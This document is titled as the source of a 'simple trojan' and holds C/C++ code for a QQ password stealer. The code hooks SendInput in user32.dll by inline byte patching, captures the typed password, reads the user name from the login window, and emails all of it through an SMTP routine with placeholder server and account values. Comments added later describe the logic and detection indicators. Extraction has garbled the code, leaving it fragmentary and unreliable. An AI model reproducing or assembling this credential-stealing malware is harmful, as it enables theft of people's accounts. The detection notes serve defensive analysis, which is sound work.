一个简单木马的源代码文档格式.docx
#include
<
windows.h>
stdio.h>
WinAble.h>
#pragma
comment(lib,"
User32.lib"
)
"
User32Hook.h"
// NOTE(review): the page extraction dropped type keywords, braces and operators
// throughout this listing; comments describe only what the surviving text shows.
// 100-byte buffer that XwSendInput fills with the characters it reconstructs.
g_Password[100]={0};
int
// Number of characters currently stored in g_Password.
g_KeyIndex=0;
BYTE
// g_OldFunc receives the original leading bytes of the hooked function;
// g_NewFunc holds the replacement bytes written over them (see InitHookCallBack).
g_OldFunc[8];
g_NewFunc[8];
FARPROC
// Address of the function being patched (SendInput in user32.dll).
g_lpHookFunc;
// Eight 0x90 bytes and a second target address; neither is referenced again in
// the visible part of the listing.
g_NewFunc2[8]={0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90};
g_lpHookFunc2;
// Characters stored for a matched key in one Caps Lock/Shift state; indexed by the
// same i that matched asciiTbl[i] in XwSendInput.
// NOTE(review): quotes and separators were lost in extraction, so the exact entry
// list cannot be confirmed from this page.
asciiKey1[]={
'
~'
'
1'
2'
3'
4'
5'
6'
7'
8'
9'
0'
-'
='
a'
b'
c'
d'
e'
f'
g'
h'
i'
j'
k'
l'
m'
n'
o'
p'
q'
r'
s'
t'
u'
v'
w'
x'
y'
z'
['
]'
\\'
;
\'
.'
/'
*'
+'
};
// Characters stored for a matched key in the other Caps Lock/Shift state; indexed
// like asciiKey1.
// NOTE(review): only the letter entries survived extraction and the closing of the
// initializer is missing from the page.
asciiKey2[]={
A'
B'
C'
D'
E'
F'
G'
H'
I'
J'
K'
L'
M'
N'
O'
P'
Q'
R'
S'
T'
U'
V'
W'
X'
Y'
Z'
// Key values that XwSendInput compares against the incoming key; the index of the
// match selects the character from asciiKey1 or asciiKey2.
// NOTE(review): several entries carry 0xFFFFFF in the upper bytes, which looks like a
// sign-extended byte value - confirm against the original file.
unsigned
asciiTbl[]={
0xFFFFFFC0,0x31,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x30,0xFFFFFFBD,0xFFFFFFBB,
0x41,0x42,0x43,0x44,0x45,0x46,0x47,0x48,0x49,0x4A,0x4B,0x4C,0x4D,0x4E,0x4F,0x50,0x51,0x52,0x53,0x54,0x55,0x56,0x57,0x58,0x59,0x5A,
0xFFFFFFDB,0xFFFFFFDD,0xFFFFFFDC,0xFFFFFFBA,0xFFFFFFDE,0xFFFFFFBC,0xFFFFFFBE,0xFFFFFFBF,
0x60,0x61,0x62,0x63,0x64,0x65,0x66,0x67,0x68,0x69,0x6A,0x6B,0x6D,0x6E,0x6F
// Replacement routine that InitHookCallBack points the patched SendInput entry at.
// It removes the patch, forwards the call to the real SendInput, re-applies the
// patch, then mirrors the key carried by the input record into g_Password.
// Returns whatever SendInput returned.
// NOTE(review): braces, operators and several statements were lost in extraction,
// so the exact conditions below cannot be confirmed from this page.
// Analyst note: this is how text typed through SendInput-based input paths ends up
// in a process-local buffer without any keyboard hook being registered.
UINT
WINAPI
XwSendInput(UINT
nInputs,LPINPUT
pInputs,int
cbSize)
nRet=0;
// Unpatch, call the genuine API, re-patch.
HookOff();
nRet=SendInput(nInputs,pInputs,cbSize);
HookOn();
=0x7374)
POINT
point;
:
// The caret x coordinate divided by 8 is used as the insertion index -
// presumably an assumed 8-pixel character width; confirm.
GetCaretPos(&
point);
postion=point.x/8;
if(pInputs->
// Walk the 63 entries of asciiTbl looking for the key value.
for(int
i=0;
i<
63;
i++)
// With Num Lock off, the scan stops before the last 15 entries.
if(GetKeyState(VK_NUMLOCK)==0&
i>
(63-15))
break;
if(asciiTbl[i]==key)
// Caps Lock and Shift state decide whether the character comes from asciiKey1
// (this branch) or asciiKey2 (the later branch).
if((GetKeyState(VK_CAPITAL)==1&
GetAsyncKeyState(VK_SHIFT)!
=0)||GetKeyState(VK_CAPITAL)==0&
GetAsyncKeyState(VK_SHIFT)==0)
// Caret before the end of the stored text: shift the tail right by one and insert.
if(postion<
g_KeyIndex)
k=g_KeyIndex;
k>
=postion;
k--)
g_Password[k+1]=g_Password[k];
g_Password[postion]=asciiKey1[i];
g_KeyIndex++;
else
// Otherwise append at the end.
g_Password[g_KeyIndex++]=asciiKey1[i];
GetAsyncKeyState(VK_SHIFT)==0)||(GetKeyState(VK_CAPITAL)==0&
=0))
g_Password[postion]=asciiKey2[i];
g_Password[g_KeyIndex++]=asciiKey2[i];
// Key value 0x8 drops the last stored character.
if(key==0x8)
if(g_KeyIndex>
0)
g_Password[g_KeyIndex]=0;
g_Password[--g_KeyIndex]=0;
return
nRet;
// Prepares the inline patch for SendInput without applying it: resolves the export
// in user32.dll, saves its first 5 bytes in g_OldFunc, and builds a 5-byte
// replacement in g_NewFunc - opcode 0xE9 followed by the 32-bit displacement from
// the end of that instruction to XwSendInput.
// NOTE(review): addresses are cast to DWORD, so the displacement arithmetic only
// holds in a 32-bit process.
// Detection note: once applied, a patch of this shape is visible as a mismatch
// between the first bytes of SendInput in memory and the same bytes in the on-disk
// user32.dll, with the jump target outside the module.
void
InitHookCallBack()
g_lpHookFunc=GetProcAddress(GetModuleHandle("
user32.dll"
),"
SendInput"
);
g_NewFunc[0]=0xe9;
// Keep the original bytes so HookOff can restore them.
memcpy(g_OldFunc,(char*)g_lpHookFunc,5);
*pNewFuncAddress=(DWORD*)&
g_NewFunc[1];
// Relative displacement: destination minus patched address minus instruction length (5).
*pNewFuncAddress=(DWORD)((FARPROC)XwSendInput)-((DWORD)g_lpHookFunc)-5;
// Applies the patch: writes the 5 bytes of g_NewFunc over the start of the function
// at g_lpHookFunc in the current process.
// Detection note: a process writing into the code of a system DLL mapped in its own
// address space is an observable behaviour for memory-integrity and EDR tooling.
HookOn()
dwOleFlag;
WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_NewFunc,5,&
dwOleFlag);
// Removes the patch: writes the 5 saved bytes from g_OldFunc back over the start of
// the function at g_lpHookFunc in the current process.
HookOff()
dwNewFlag;
WriteProcessMemory(GetCurrentProcess(),(void*)g_lpHookFunc,(void*)g_OldFunc,5,&
dwNewFlag);
木马dll函数的 main.cpp 文件的代码
Windows.h>
SendMail.h"
comment(linker,"
/export:
DllCanUnloadNow=Command.DllCanUnloadNow"
DllGetClassObject=Command.DllGetClassObject"
DllMain=Command.DllMain"
DllRegisterServer=Command.DllRegisterServer"
DllUnregisterServer=Command.DllUnregisterServer"
// Handles of the foreground window and of the two child windows WaitLoginWindow
// picks out as the user-name and password fields.
HWND
hLoginWindow,hUserName,hUserPwd;
// Text read back with WM_GETTEXT in ServerThreadProc: the user-name field and the
// window title respectively, 100 bytes each.
g_UserName[100]={0};
g_Version[100]={0};
// Polls the foreground window and probes two fixed points inside it, (left+100,
// top+115) and (left+100, top+155), treating the windows found there as the
// user-name and password fields. The style of the second one is tested against
// ES_PASSWORD.
// NOTE(review): the loop exit was lost in extraction; presumably the function
// returns once the probed control has the ES_PASSWORD style - confirm.
// Analyst note: the hard-coded pixel offsets tie this routine to one specific
// window layout.
WaitLoginWindow()
Sleep(1500);
while(true)
hLoginWindow=GetForegroundWindow();
pni;
RECT
rcWindow;
GetWindowRect(hLoginWindow,&
rcWindow);
pni.y=rcWindow.top+115;
pni.x=rcWindow.left+100;
hUserName=WindowFromPoint(pni);
pni.y=rcWindow.top+155;
hUserPwd=WindowFromPoint(pni);
LONG
lStyle
=
GetWindowLong(hUserPwd,
GWL_STYLE);
if(lStyle
ES_PASSWORD)
// Poll interval between probes.
Sleep(100);
// Thread routine started from DllMain. It clears g_Password, waits for the target
// window, reads the user-name field and the window title with WM_GETTEXT, formats
// them together with g_Password into a 64-byte message, fills an SMTPINFO record
// and hands it to SendMail.
// NOTE(review): loop structure and braces were lost in extraction; the order of the
// statements below is as printed on the page.
// Detection note: an outbound SMTP session (port "25" below) opened by a process
// that is not a mail client is the network-side indicator of this behaviour.
ServerThreadProc(LPVOID
lpParameter)
memset(g_Password,0,100);
WaitLoginWindow();
// Read the field text and the window title across window boundaries.
SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)g_UserName);
SendMessage(hLoginWindow,WM_GETTEXT,100,(LPARAM)g_Version);
tempAccounts[100];
// Re-read the field and keep the newer non-empty value.
SendMessage(hUserName,WM_GETTEXT,100,(LPARAM)tempAccounts);
if(strcmp(g_UserName,tempAccounts)!
=0&
strlen(tempAccounts)!
=0)
strcpy(g_UserName,tempAccounts);
// The message is built once the probed control no longer has ES_PASSWORD set -
// presumably because the window changed after submission; confirm.
if((lStyle
ES_PASSWORD)==0)
szContext[64]={0};
sprintf(szContext,"
QQ版本:
%s\r\n用户名:
%s\r\n密
码:
%s\r\n"
g_Version,g_UserName,g_Password);
// The server name, account and addresses below are filler strings in this
// listing (runs of a single letter), not real values.
SMTPINFO
smtpinfo;
strcpy(smtpinfo.SmtpSrvName,"
AAAAAAAAAAAAAAAAAAAA"
strcpy(smtpinfo.Port,"
25"
strcpy(smtpinfo.UserName,"
BBBBBBBBBBBBBBBBBBBB"
strcpy(smtpinfo.Password,"
CCCCCCCCCCCCCCCCCCCC"
strcpy(smtpinfo.From,"
DDDDDDDDDDDDDDDDDDDD"
strcpy(smtpinfo.To,"
EEEEEEEEEEEEEEEEEEEE"
strcpy(smtpinfo.Subject,"
*☆‰小五※*提醒-获取到新的QQ!
strcpy(smtpinfo.Msg,szContext);
SendMail(&
smtpinfo);
0;
// DLL entry point. On DLL_PROCESS_ATTACH it prepares the SendInput patch
// (InitHookCallBack) and starts ServerThreadProc on a new thread; the detach case
// does nothing visible here. Returns TRUE.
// Analyst note: the linker directives earlier in this file forward the COM exports
// (DllGetClassObject, DllRegisterServer, ...) to a module named "Command", so this
// DLL appears to stand in front of another one - TODO confirm from the build.
// A DLL that forwards every export elsewhere and spawns a thread at load time is
// worth flagging during triage.
BOOL
DllMain(__in
*
_HDllHandle,
__in
_Reason,
__in_opt
_Reserved)
switch(_Reason)
case
DLL_PROCESS_ATTACH:
InitHookCallBack();
CreateThread(NULL,0,ServerThreadProc,0,0,0);
DLL_PROCESS_DETACH:
TRUE;
WinMain(HINSTANCE
hInstance,HINSTANCE
hPrevInstance,LPSTR
lpCmdLine,int
nCmdShow)
User32Hook.h 文件的代码
// Exposes the buffer filled by XwSendInput to main.cpp, which reads it when it
// builds the outgoing message.
extern
g_Password[100];
SendMail.h文件
// Parameters for one SMTP submission, all held in fixed-size fields: server name and
// port (as text), login name and password, sender, recipient, subject and body.
// NOTE(review): field types were lost in extraction; the callers fill every field
// with strcpy, so they are presumably char arrays.
typedef
struct
_SMTPINFO
SmtpSrvName[32];
Port[7];
UserName[16];
Password[16];
From[32];
To[32];
Subject[32];
Msg[64];
}SMTPINFO;
// Converts the user name and password to Base64 encoding.
// (SendMail calls this in a loop over 3-byte input groups and 4-byte output groups.)
Base64(unsigned
*chasc,unsigned
*chuue);
// Exchanges one step of the SMTP dialogue on sockid. Presumably waits for the reply
// code in OkCode and then sends pSend - confirm against the definition, which is not
// on this page.
Talk(SOCKET
sockid,
const
*OkCode,
*pSend);
// Sends one message described by *psmtpinfo.
SendMail(const
*psmtpinfo);
SendMail.cpp文件中的代码
winsock2.h>
#define
WIN32_LEAN_AND_MEAN
stdlib.h>
ws2_32.lib"
// File-scope scratch state for SendMail: a 256-byte buffer that receives the
// Base64 output, a loop index, and the lengths of the login name and password.
buflen
256;
buf[buflen];
i,userlen,passlen;
//---------------------------------------------------------------------
*psmtpinfo)
//准备网络连接
WSADATA
wsadata;
if
(WSAStartup(MAKEWORD(2,2),&
wsadata)
!
1;
//创建套接字
SOCKET
sockid;
((sockid
socket(AF_INET,SOCK_STREAM,0))
==
INVALID_SOCKET)
WSACleanup();
//得到smtp服务器ip
hostent
*phostent
gethostbyname(psmtpinfo->
SmtpSrvName);
sockaddr_in
addr;
CopyMemory(&
addr.sin_addr.S_un.S_addr,
phostent->
h_addr_list[0],
sizeof(addr.sin_addr.S_un.S_addr));
addr.sin_family
AF_INET;
addr.sin_port
htons(atoi(psmtpinfo->
Port));
ZeroMemory(&
addr.sin_zero,
8);
//连接服务器
(connect(sockid,
(struct
sockaddr
*)&
addr,
sizeof(struct
sockaddr_in))
SOCKET_ERROR)
goto
STOP;
(Talk(sockid,
220"
EHLO
sjdf"
))
250"
AUTH
LOGIN"
ZeroMemory(buf,
buflen);
userlen
lstrlen(psmtpinfo->
UserName);
passlen
Password);
for(i
i
(userlen%3?
userlen/3+1:
userlen/3);
Base64((unsigned
)(psmtpinfo->
UserName
+
3),(unsigned
)(
buf
4));
334"
buf))
S